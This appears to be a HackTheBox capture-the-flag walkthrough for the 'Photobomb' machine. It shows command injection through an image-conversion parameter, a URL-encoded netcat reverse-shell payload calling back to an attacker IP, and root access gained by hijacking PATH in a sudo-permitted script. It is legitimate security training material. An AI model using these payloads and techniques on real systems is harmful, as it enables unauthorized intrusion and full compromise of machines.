Photobomb HackTheBox Walkthrough

Photobomb is an easy level linux machine from HackTheBox which includes exploiting an image downloading functionality to get a RCE and then exploiting a bash script which does not use absolute paths. Let's get started!

Photobomb HackTheBox Walkthrough

Network Scan

As usual, I started the initial enumeration by running a port scan using nmap looking for open ports and running services.

┌──(madhav㉿kali)-[~/ctf/htb/photobomb]
└─$ nmap -sC -sV -oN nmap/initial 10.10.11.182
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-16 03:40 IST
Nmap scan report for 10.10.11.182
Host is up (0.30s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e22473bbfbdf5cb520b66876748ab58d (RSA)
|   256 04e3ac6e184e1b7effac4fe39dd21bae (ECDSA)
|_  256 20e05d8cba71f08c3a1819f24011d29e (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.42 seconds

We have two ports open, we have SSH running on port 22 and a HTTP web server running on port 80. We can see from the nmap results that the web server redirects to http://photobomb.htb So let's add it to our hosts file.

┌──(madhav㉿kali)-[~/ctf/htb]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
10.10.11.182    photobomb.htb

We are good to go! Now let's start enumerating the port 80 first.

Web Enumeration and User Shell

On visiting the website in our web browser, we get a static website. It has a link which redirects us to the login page.

On checking the source code of this website we get a javascript file which contains some credentials.

view-source:http://photobomb.htb/photobomb.js

After logging in, we are redirected to the /printer page. The printer page has some images and it lets us download those images in different formats and resolutions.

The print functionality works great, and we get the selected image according to the resolution and the file type requested. Let's explore and try exploiting this application. I captured the download request via BurpSuite and found something interesting.

After testing some custom inputs in parameters, I found out that the filetype parameter used here is vulnerable to command injection.

The application is converting the images in backend using the convert tool from ImageMagick and doing something like:

convert [photo] -resize [dimensions] name.[filetype]

We need to add ;<command> after the filetype parameter, so that our command also gets executed with the request.

We do not get any output but our command gets executed in the background. Similarly, we can follow the same steps to execute a reverse shell payload. I generated the payload from revshells.com.

We also need to URL encode the payload so that it can be executed successfully. After encoding, the payload will look similar to this:

rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%2010.10.14.87%209001%20%3E%2Ftmp%2Ff

The payload gets executed successfully and we get a reverse shell back to our system.

┌──(madhav㉿kali)-[~/ctf/htb/photobomb]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.87] from (UNKNOWN) [10.10.11.182] 39440
sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
bash-5.0$ id
id
uid=1000(wizard) gid=1000(wizard) groups=1000(wizard)
bash-5.0$

Now that we have a user shell, we can read the user flag present in the home directory of the wizard user.

bash-5.0$ cd /home/wizard
cd /home/wizard
bash-5.0$ cat user.txt
cat user.txt
*********************************
bash-5.0$

Root Shell

Getting a root shell on this box was pretty straight forward. First of all, I used the sudo -l to check if we can execute any files as other users.

I found that we can execute /opt/cleanup.sh as user root without using any password. Also notice the SETENV flag set.

bash-5.0$ sudo -l
sudo -l
Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh

First of all, let us check the /opt/cleanup.sh. This script is made to clean the log files. We can see that the programs like (cd, find and chown) are used here without using their absolute paths.

This means that we can create our vulnerable version of these programs and force the script to execute our vulnerable version by modifying the PATH.

bash-5.0$ cat /opt/cleanup.sh
cat /opt/cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;

To exploit this, I created a new folder named exploit inside which I created a find program which will simply execute /bin/bash when called. Then I added the folder to the starting of the PATH.

bash-5.0$ mkdir exploit
mkdir exploit
bash-5.0$ cd exploit
cd exploit
bash-5.0$ echo "/bin/bash" > find
echo "/bin/bash" > find
bash-5.0$ chmod +x find
chmod +x find
bash-5.0$

Next, I executed the /opt/cleanup.sh script and we got the root shell. We also need to set PATH.

bash-5.0$ sudo PATH=$PWD:$PATH /opt/cleanup.sh
sudo PATH=$PWD:$PATH /opt/cleanup.sh
root@photobomb:/home/wizard/photobomb# id
id
uid=0(root) gid=0(root) groups=0(root)

Hurrayy! We are root. Now that we have a root shell, we can read our final flag present in the root directory!

root@photobomb:/home/wizard/photobomb# cd /root
cd /root
root@photobomb:~# ls
ls
root.txt
root@photobomb:~# cat root.txt
cat root.txt
*********************************
root@photobomb:~#

That's it! Thank you for reading this article. Do let me know in the comments if you have any questions or feedback. Stay tuned for similar articles.

NOTE: The awesome artwork used in this article was created by Rick Hines.